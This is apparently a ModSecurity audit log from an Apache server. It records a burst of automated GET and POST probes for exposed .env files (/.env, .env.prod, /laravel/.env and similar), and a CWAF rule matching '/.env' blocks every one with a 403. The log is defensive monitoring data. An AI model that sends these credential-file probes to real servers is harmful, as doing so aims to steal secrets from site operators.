1746942938964632 876; combined=317, p1=273, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69a1a547-Z-- --0fb9bd66-A-- [11/May/2025:14:14:23 +0700] aCBOT0EuxCpmyy5aJPm7hAAAAAg 103.236.140.4 54418 103.236.140.4 8181 --0fb9bd66-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 31.56.56.147 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0fb9bd66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fb9bd66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746947663246627 927 (- - -) Stopwatch2: 1746947663246627 927; combined=377, p1=314, p2=0, p3=0, p4=0, p5=63, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fb9bd66-Z-- --08bb633e-A-- [11/May/2025:14:31:11 +0700] aCBSP0EuxCpmyy5aJPm7jAAAAAE 103.236.140.4 54492 103.236.140.4 8181 --08bb633e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --08bb633e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08bb633e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948671204675 683 (- - -) Stopwatch2: 1746948671204675 683; combined=261, p1=226, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08bb633e-Z-- --aef59b4b-A-- [11/May/2025:14:31:11 +0700] aCBSPwpy530QiWmSS61dHAAAAFM 103.236.140.4 54494 103.236.140.4 8181 --aef59b4b-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --aef59b4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aef59b4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948671629900 694 (- - -) Stopwatch2: 1746948671629900 694; combined=278, p1=242, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aef59b4b-Z-- --576e2a30-A-- [11/May/2025:14:31:11 +0700] aCBSP0EuxCpmyy5aJPm7jQAAABA 103.236.140.4 54496 103.236.140.4 8181 --576e2a30-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --576e2a30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --576e2a30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948671979776 627 (- - -) Stopwatch2: 1746948671979776 627; combined=252, p1=219, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --576e2a30-Z-- --33961051-A-- [11/May/2025:14:31:12 +0700] aCBSQApy530QiWmSS61dHQAAAEY 103.236.140.4 54498 103.236.140.4 8181 --33961051-B-- POST /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --33961051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33961051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948672446836 644 (- - -) Stopwatch2: 1746948672446836 644; combined=251, p1=218, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33961051-Z-- --c1c7cb07-A-- [11/May/2025:14:31:13 +0700] aCBSQebs1CLLACKj-_zQRwAAAIA 103.236.140.4 54500 103.236.140.4 8181 --c1c7cb07-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 Accept: */* --c1c7cb07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c7cb07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948673224985 653 (- - -) Stopwatch2: 1746948673224985 653; combined=256, p1=220, p2=0, p3=0, p4=0, p5=36, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1c7cb07-Z-- --38d91f13-A-- [11/May/2025:14:31:13 +0700] aCBSQQpy530QiWmSS61dHgAAAEA 103.236.140.4 54502 103.236.140.4 8181 --38d91f13-B-- POST /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --38d91f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38d91f13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948673567545 629 (- - -) Stopwatch2: 1746948673567545 629; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38d91f13-Z-- --de81ef40-A-- [11/May/2025:14:31:13 +0700] aCBSQUEuxCpmyy5aJPm7jgAAABY 103.236.140.4 54504 103.236.140.4 8181 --de81ef40-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --de81ef40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de81ef40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948673916852 640 (- - -) Stopwatch2: 1746948673916852 640; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de81ef40-Z-- --1bd32304-A-- [11/May/2025:14:31:14 +0700] aCBSQkEuxCpmyy5aJPm7jwAAABU 103.236.140.4 54506 103.236.140.4 8181 --1bd32304-B-- POST /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --1bd32304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bd32304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948674433906 656 (- - -) Stopwatch2: 1746948674433906 656; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bd32304-Z-- --5e310a14-A-- [11/May/2025:14:31:14 +0700] aCBSQkEuxCpmyy5aJPm7kAAAAA0 103.236.140.4 54508 103.236.140.4 8181 --5e310a14-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --5e310a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e310a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948674815730 629 (- - -) Stopwatch2: 1746948674815730 629; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e310a14-Z-- --139a977c-A-- [11/May/2025:14:31:15 +0700] aCBSQ0EuxCpmyy5aJPm7kQAAAAM 103.236.140.4 54510 103.236.140.4 8181 --139a977c-B-- POST /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --139a977c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --139a977c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948675179787 705 (- - -) Stopwatch2: 1746948675179787 705; combined=257, p1=225, p2=0, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --139a977c-Z-- --19fad02c-A-- [11/May/2025:14:31:15 +0700] aCBSQ-bs1CLLACKj-_zQSAAAAI8 103.236.140.4 54512 103.236.140.4 8181 --19fad02c-B-- GET /.env.development%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* --19fad02c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19fad02c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948675536142 649 (- - -) Stopwatch2: 1746948675536142 649; combined=270, p1=233, p2=0, p3=0, p4=0, p5=37, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19fad02c-Z-- --c82aec3b-A-- [11/May/2025:14:31:16 +0700] aCBSREEuxCpmyy5aJPm7kgAAAAU 103.236.140.4 54514 103.236.140.4 8181 --c82aec3b-B-- POST /.env.development%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --c82aec3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c82aec3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948676368792 694 (- - -) Stopwatch2: 1746948676368792 694; combined=271, p1=228, p2=0, p3=0, p4=0, p5=42, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c82aec3b-Z-- --9b2c1902-A-- [11/May/2025:14:31:16 +0700] aCBSRApy530QiWmSS61dHwAAAE8 103.236.140.4 54516 103.236.140.4 8181 --9b2c1902-B-- GET /laravel/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* --9b2c1902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b2c1902-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948676944212 631 (- - -) Stopwatch2: 1746948676944212 631; combined=261, p1=229, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b2c1902-Z-- --7e442b4c-A-- [11/May/2025:14:31:17 +0700] aCBSRUEuxCpmyy5aJPm7kwAAAAI 103.236.140.4 54518 103.236.140.4 8181 --7e442b4c-B-- POST /laravel/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --7e442b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e442b4c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948677308152 852 (- - -) Stopwatch2: 1746948677308152 852; combined=342, p1=302, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e442b4c-Z-- --d869c22a-A-- [11/May/2025:14:31:17 +0700] aCBSRebs1CLLACKj-_zQSQAAAI0 103.236.140.4 54520 103.236.140.4 8181 --d869c22a-B-- GET /admin-app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --d869c22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d869c22a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948677720876 573 (- - -) Stopwatch2: 1746948677720876 573; combined=216, p1=188, p2=0, p3=0, p4=0, p5=28, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d869c22a-Z-- --ed2cc810-A-- [11/May/2025:14:31:18 +0700] aCBSRgpy530QiWmSS61dIAAAAFU 103.236.140.4 54522 103.236.140.4 8181 --ed2cc810-B-- POST /admin-app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --ed2cc810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed2cc810-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948678076549 688 (- - -) Stopwatch2: 1746948678076549 688; combined=271, p1=240, p2=0, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed2cc810-Z-- --bef42e09-A-- [11/May/2025:14:31:23 +0700] aCBSSwpy530QiWmSS61dIQAAAEE 103.236.140.4 54526 103.236.140.4 8181 --bef42e09-B-- GET /app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --bef42e09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bef42e09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948683605881 769 (- - -) Stopwatch2: 1746948683605881 769; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bef42e09-Z-- --023e2b3b-A-- [11/May/2025:14:31:24 +0700] aCBSTApy530QiWmSS61dIgAAAEM 103.236.140.4 54528 103.236.140.4 8181 --023e2b3b-B-- POST /app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --023e2b3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --023e2b3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948684287354 695 (- - -) Stopwatch2: 1746948684287354 695; combined=301, p1=271, p2=0, p3=0, p4=0, p5=30, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --023e2b3b-Z-- --dc826234-A-- [11/May/2025:14:31:24 +0700] aCBSTEEuxCpmyy5aJPm7lAAAAA8 103.236.140.4 54530 103.236.140.4 8181 --dc826234-B-- GET /development/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* 